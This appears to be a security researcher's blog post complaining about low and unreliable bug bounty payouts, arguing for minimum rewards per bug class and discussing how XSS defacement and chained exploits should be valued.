When it comes to public bounties I don’t spend a lot of time on them, because even though they usually pay, the amount can be insulting. I know, I know if you’re getting paid you shouldn’t be insulted, but think about it. If you demanded I make two separate exploits for you, but say you are only paying for one of them, then I am only making one proof of concept. If you went to a restaurant and said you only have enough money for two pancakes, but demanded four they’d only make two or they’d kick you out.
The payout for the bounty that demanded two proof of concepts for the price of one only paid $50. The issue wasn’t CSRF, rather any signed up user for this product could make malicious iframes or upload malicious images. I think that’s worth more than $50.
I feel that it’s pointless to look for bugs that have a greater impact, like RCE, SQLI, etc. if you don’t even know if the company will pay an adequate amount. Also, it’s extremely insulting when companies add in terms and conditions saying they will own your exploit if you submit it and you can’t use it anywhere else. A lot of bugs can be used across the board, especially when it comes to open source bugs. It’s a slap in the face when the bounty doesn’t pay anything, not even points. If it doesn’t pay well, then I just ignore it.
It would be extremely useful for companies to have a minimum amount for each type of bug, that way you know the minimum you can make per bug and if it’s worth your time looking for more severe bugs. It would also be useful to have a ratio of how often they actually pay.
The problem with what I proposed above is that the company may try to downgrade the bug or in the one issue I talked about above the company thought Same Origin Policy would protect them from malicious iframes. It took a lot of explaining to get through to them and refining the proof of concept over and over until I just made it so if anyone accessed their test site they were redirected to a picture I made of skull and bones saying “Argh, I love bounties” That’s hosted on my companies site. I still believe that’s worth more then $50, since any user could do that, but I just won’t work with that company again.
What I am trying to say is that when you don’t know how much you will get paid you don’t have as big of an incentive to work on the project. I view private bounties differently then public bounties.
When I work on private bounties I work a lot harder then public bounties. There was one project that had a high minimum payout. I knew the company well and their reputation of not paying. I decided to make three proof of concepts and put a lot of time into one proof of concept. While every exploit met the conditions of the bounty and broke the security exactly as they asked, only one was worth the amount they were offering. Sadly, the company didn’t want to pay for any of them. I wasn’t thrilled with that, but the bounty still had a good ending thanks to bugcrowd. I can’t say anymore then that because what happens in a private bounty stays private.
Also, XSS sometimes can be quite bad for a company, especially if it defaces the entire site. If an XSS defaces the entire site or the subdomain it’s worth more then the average $100, since a deface is just a simple example. You could have malicious code load on every page, etc. Also, how do we rank how much chained exploits are worth? Is each part of the chain worth the minimum for each exploit and you add them together? Or are chains worth more?
These are just a few things I have to say about payment per bug. I may add a longer post later.